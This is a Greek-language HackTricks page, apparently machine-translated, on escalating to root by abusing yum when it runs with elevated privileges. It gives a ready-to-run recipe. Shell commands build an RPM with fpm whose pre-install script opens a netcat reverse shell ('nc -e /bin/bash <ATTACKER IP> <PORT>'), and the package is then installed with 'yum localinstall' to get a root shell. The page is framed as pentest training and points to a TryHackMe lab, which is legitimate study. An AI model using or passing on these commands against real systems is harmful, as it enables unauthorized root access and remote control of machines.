5.8 KiB
Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
- Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα κόλπα σας για το hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.
Περαιτέρω παραδείγματα γύρω από το yum μπορούν επίσης να βρεθούν στο gtfobins.
Εκτέλεση αυθαίρετων εντολών μέσω των πακέτων RPM
Έλεγχος του περιβάλλοντος
Προκειμένου να εκμεταλλευτείτε αυτό το διάνυσμα, ο χρήστης πρέπει να μπορεί να εκτελεί εντολές yum ως ένας χρήστης με υψηλότερα δικαιώματα, δηλαδή ως root.
Ένα λειτουργικό παράδειγμα αυτού του διανύσματος
Ένα λειτουργικό παράδειγμα αυτής της εκμετάλλευσης μπορεί να βρεθεί στο δωμάτιο daily bugle στο tryhackme.
Συσκευασία ενός πακέτου RPM
Στην παρακάτω ενότητα, θα καλύψω τη συσκευασία ενός αντίστροφου κέλυφους σε ένα πακέτο RPM χρησιμοποιώντας το fpm.
Το παρακάτω παράδειγμα δημιουργεί ένα πακέτο που περιλαμβάνει έναν παρακινούμενο σεναρίου πριν από την εγκατάσταση με έναν αυθαίρετο σενάριο που μπορεί να καθοριστεί από τον επιτιθέμενο. Όταν εγκαθίσταται, αυτό το πακέτο θα εκτελεί την αυθαίρετη εντολή. Έχω χρησιμοποιήσει ένα απλό παράδειγμα αντίστροφου κέλυφους με netcat για επίδειξη, αλλά αυτό μπορεί να αλλάξει όπως απαιτείται.
EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR
Παγίδευση ενός κελιού
Χρησιμοποιώντας το παραπάνω παράδειγμα και υποθέτοντας ότι το yum μπορεί να εκτελεστεί από έναν χρήστη με υψηλότερα δικαιώματα.
- Μεταφέρετε το rpm στον κεντρικό υπολογιστή
- Ξεκινήστε έναν ακροατή στον τοπικό σας υπολογιστή, όπως ο παράδειγμα ακροατής netcat
- Εγκαταστήστε το ευπάθεια πακέτο
yum localinstall -y exploited-1.0-1.noarch.rpm
Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
- Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF, ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε The PEASS Family, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.